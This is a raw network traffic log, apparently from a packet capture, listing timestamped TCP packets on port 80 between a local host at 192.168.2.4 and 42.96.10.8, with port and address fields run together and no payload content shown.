                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576067924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576067924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576081038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576097012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576111078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576124907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576126099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576174021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576189995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576204062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576205015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576219082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576222897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576236010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576263905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576328039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576330900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576343060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576358080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576370955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576385021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576400042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576451063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576451063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576486111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576502085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576517105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576531887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576546907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576561928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576575994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576585054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576585054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576592922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576670885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576670885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.616885900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.616911888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617047071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617064953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617080927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617105961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617120981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617134094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617136955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617152929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617166996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617170095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617208004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617208958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617227077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617242098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617249966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617258072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617434025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.617434025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.660227060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.660243034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.660250902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.660348892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.669822931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.669893980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.669908047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.669915915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.669948101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670017958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670854092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670869112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670883894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670913935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670928955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670933962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670938969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.670972109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.671020031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.671030045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.671037912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.671108961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689258099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689271927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689286947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689337969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689346075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689347029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689363003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689431906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689553022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689569950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689585924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689637899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689637899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689691067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689703941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689712048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689727068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689733028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689739943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689748049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689753056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689760923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689774990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689780951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689790964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689811945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689821005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689826012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689841032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689855099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689856052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689856052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689871073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689887047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689901114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689902067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689950943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689955950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689964056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689971924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689975023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.689985991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690054893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690078974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690104961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690119982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690121889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690160036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690258980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690273046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690331936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690566063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690581083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690589905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690680981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690696955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690711021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690711975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690727949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690752029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690766096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690774918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690774918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690781116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690800905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690809011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690825939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690834045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690840960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690850019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690908909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690916061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690933943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690949917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690958023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690958023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690964937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.690980911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691029072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691045046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691068888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691083908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691097021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691104889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691112041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691118956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691133022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691142082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691184998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691184998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691257000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691272974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691287041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691302061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691324949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691328049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691387892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691415071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691431046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691446066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691462040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691477060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691478968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691489935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691497087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691574097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691618919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691632986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691647053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691653967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691660881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691668034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691683054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691699028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691724062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691724062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691737890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691813946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691834927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691849947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691864014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691879988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691895008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691904068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691912889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691915989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691963911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691978931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691993952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.691999912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692030907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692039013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692045927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692055941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692065001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692073107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692106962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692197084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692229986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692245960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692260981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692276001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692339897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692341089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692357063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692364931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692370892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692382097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692390919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692452908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692468882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692482948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692492008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692513943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.692682981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732728958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732743979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732768059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732784986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732799053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732812881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732821941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732840061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732881069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732896090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732907057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732914925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732929945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732930899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732939005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732947111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.732989073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.733009100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.733040094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.776007891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.776030064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.776041031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.776215076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.785440922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.785456896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.785465956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.785552979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786406994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786462069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786472082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786478996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786530018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786546946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786598921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786602974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786602974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786614895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786632061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.786678076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805650949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805668116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805696011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805710077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805726051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805725098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805742025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805757999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805762053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805773020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805788040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805803061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805819035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805831909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805849075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805849075 CET4973380192.168.2.442.96.10.8
